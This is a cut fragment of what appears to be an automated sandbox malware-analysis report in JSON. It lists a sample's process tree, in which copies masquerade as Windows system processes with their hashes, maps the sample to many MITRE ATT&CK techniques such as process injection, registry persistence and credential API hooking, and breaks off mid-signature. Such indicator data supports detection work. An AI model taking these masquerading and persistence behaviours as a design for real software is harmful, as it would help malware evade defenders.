"f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00002472", "parentuid": "00000000-00006064", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00004444", "parentuid": "00000000-00006064", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00003436", "parentuid": "00000000-00006008", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00004384", "parentuid": "00000000-00006008", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00000472", "parentuid": "00000000-00004384", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00000416", "parentuid": "00000000-00004384", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00001216", "parentuid": "00000000-00004384", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00003824", "parentuid": "00000000-00004384", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00003856", "parentuid": "00000000-00004384", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00001708", "parentuid": "00000000-00004384", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00003640", "parentuid": "00000000-00004384", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00006060", "parentuid": "00000000-00005712", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00006084", "parentuid": "00000000-00006060", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00004168", "parentuid": "00000000-00006060", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00004220", "parentuid": "00000000-00006060", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00002256", "parentuid": "00000000-00006060", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00000132", "parentuid": "00000000-00006060", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00003592", "parentuid": "00000000-00006060", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00003708", "parentuid": "00000000-00006060", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00005484", "parentuid": "00000000-00005712", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00005984", "parentuid": "00000000-00005712", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00002248", "parentuid": "00000000-00005984", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00003232", "parentuid": "00000000-00005984", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00003940", "parentuid": "00000000-00005984", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00001176", "parentuid": "00000000-00005984", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00001584", "parentuid": "00000000-00005984", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00000284", "parentuid": "00000000-00005984", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00003268", "parentuid": "00000000-00005984", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00003996", "parentuid": "00000000-00005712", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00002792", "parentuid": "00000000-00005712", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00004404", "parentuid": "00000000-00002792", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "89b234b5f4f8f4fe78544bbad15a6e7d8a4f5131378bfdd182bff448113b4572"}, {"uid": "00000000-00003952", "parentuid": "00000000-00002792", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "fc459df4655b13a8949743361d65489586a7af12247b63bfaebea3e4d91bb47f"}, {"uid": "00000000-00000500", "parentuid": "00000000-00002792", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "fdc33a10c09246a977d388a7969bbb720fae67bc276a93b07c0f288fa765c0f5"}, {"uid": "00000000-00002164", "parentuid": "00000000-00002792", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "48e89934f6eb3c60f134173ef906292c262a06e970f8ca8c1320131f3bf482f4"}, {"uid": "00000000-00004448", "parentuid": "00000000-00002792", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "f679452cf62f9e86c232032763ed0cdc4f7c0d417bc808a7826097be912c948f"}, {"uid": "00000000-00003452", "parentuid": "00000000-00002792", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "a6bc8d73fd4e59cb34f6443da7637a12a9aa9a1999ffa9d3c6b26d328a5c75de"}, {"uid": "00000000-00001352", "parentuid": "00000000-00002792", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00001580", "parentuid": "00000000-00005712", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "e7118d3626d6c9164107198bbcea27cb6015904d83244d121afa6f7c52df7c2a"}, {"uid": "00000000-00004524", "parentuid": "00000000-00005712", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "4281c5008ef0f7b255d19c686b4887a98dd45370b50cb5cb4e96967a4d3df0f1"}, {"uid": "00000000-00000620", "parentuid": "00000000-00004524", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "4281c5008ef0f7b255d19c686b4887a98dd45370b50cb5cb4e96967a4d3df0f1"}, {"uid": "00000000-00002860", "parentuid": "00000000-00004524", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c45fc8a56bde34990bba271c5cd2607382c6cf462b167b0a4c5e35a6d2b44774"}, {"uid": "00000000-00001020", "parentuid": "00000000-00004524", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b9f287d5f1e8b36047ab6f825a02d7916b105ed66689f596e49148843f6d4d06"}, {"uid": "00000000-00000580", "parentuid": "00000000-00004524", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "94ba801c1477d2498acc08a6687aca362953f5a9818533673621e859ae0ad844"}, {"uid": "00000000-00000404", "parentuid": "00000000-00005712", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "c45fc8a56bde34990bba271c5cd2607382c6cf462b167b0a4c5e35a6d2b44774"}, {"uid": "00000000-00000576", "parentuid": "00000000-00005712", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "b9f287d5f1e8b36047ab6f825a02d7916b105ed66689f596e49148843f6d4d06"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Rootkit", "attck_id": "T1014", "attck_id_wiki": "https://attack.mitre.org/techniques/T1014", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 2, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Domain Trust Discovery", "attck_id": "T1482", "attck_id_wiki": "https://attack.mitre.org/techniques/T1482", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Peripheral Device Discovery", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120", "malicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"RegEdit_RegEdit\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for window \"Registry Editor\"\n 